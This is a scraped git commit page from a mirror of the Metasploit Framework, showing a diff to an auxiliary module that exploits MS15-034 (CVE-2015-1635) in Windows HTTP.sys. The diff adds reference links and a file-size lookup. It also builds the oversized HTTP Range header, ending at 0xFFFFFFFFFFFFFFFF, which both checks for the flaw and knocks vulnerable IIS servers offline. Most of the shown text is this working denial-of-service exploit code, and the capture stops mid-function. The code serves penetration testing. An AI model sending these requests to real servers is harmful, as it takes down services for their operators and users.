infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5213, improvements to MS15-035 DoS

bug/bundler_fix
Brent Cook 2015-04-24 10:54:48 -05:00
parent 7a3949ed52 a44da8e6d7
commit f457f36cdd
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 39 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

55
modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb
View File

@ -37,7 +37,9 @@ class Metasploit3 < Msf::Auxiliary
['CVE', '2015-1635'], ['CVE', '2015-1635'],
['MSB', 'MS15-034'], ['MSB', 'MS15-034'],
['URL', 'http://pastebin.com/ypURDPc4'], ['URL', 'http://pastebin.com/ypURDPc4'],
['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'] ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],
['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],
['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) ))
@ -50,6 +52,10 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('RHOST') deregister_options('RHOST')
end end
def upper_range
0xFFFFFFFFFFFFFFFF
end
def run_host(ip) def run_host(ip)
if check_host(ip) == Exploit::CheckCode::Vulnerable if check_host(ip) == Exploit::CheckCode::Vulnerable
dos_host(ip) dos_host(ip)
@ -58,7 +64,34 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
def get_file_size(ip)
@file_size ||= lambda {
file_size = -1
uri = normalize_uri(target_uri.path)
res = send_request_raw({'uri'=>uri})
unless res
vprint_error("#{ip}:#{rport} - Connection timed out")
return file_size
end
if res.code == 404
vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.")
return file_size
end
file_size = res.body.length
vprint_status("#{ip}:#{rport} - File length: #{file_size} bytes")
return file_size
}.call
end
def dos_host(ip) def dos_host(ip)
file_size = get_file_size(ip)
lower_range = file_size - 2
# In here we have to use Rex because if we dos it, it causes our module to hang too # In here we have to use Rex because if we dos it, it causes our module to hang too
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
begin begin
@ -68,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'headers' => {
'Range' => 'bytes=18-18446744073709551615' 'Range' => "bytes=#{lower_range}-#{upper_range}"
} }
}) })
cli.send_request(req) cli.send_request(req)
@ -78,26 +111,16 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{ip}:#{rport} - DOS request sent") print_status("#{ip}:#{rport} - DOS request sent")
end end
def check_host(ip) def check_host(ip)
return Exploit::CheckCode::Unknown if get_file_size(ip) == -1
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
res = send_request_raw({'uri'=>uri})
unless res
vprint_error("#{ip}:#{rport} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 404
vprint_error("#{ip}:#{rport} - You got a 404. URI must be a valid resource.")
return Exploit::CheckCode::Unknown
end
res = send_request_raw({ res = send_request_raw({
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'headers' => {
'Range' => 'bytes=0-18446744073709551615' 'Range' => "bytes=0-#{upper_range}"
} }
}) })
if res && res.body.include?('Requested Range Not Satisfiable') if res && res.body.include?('Requested Range Not Satisfiable')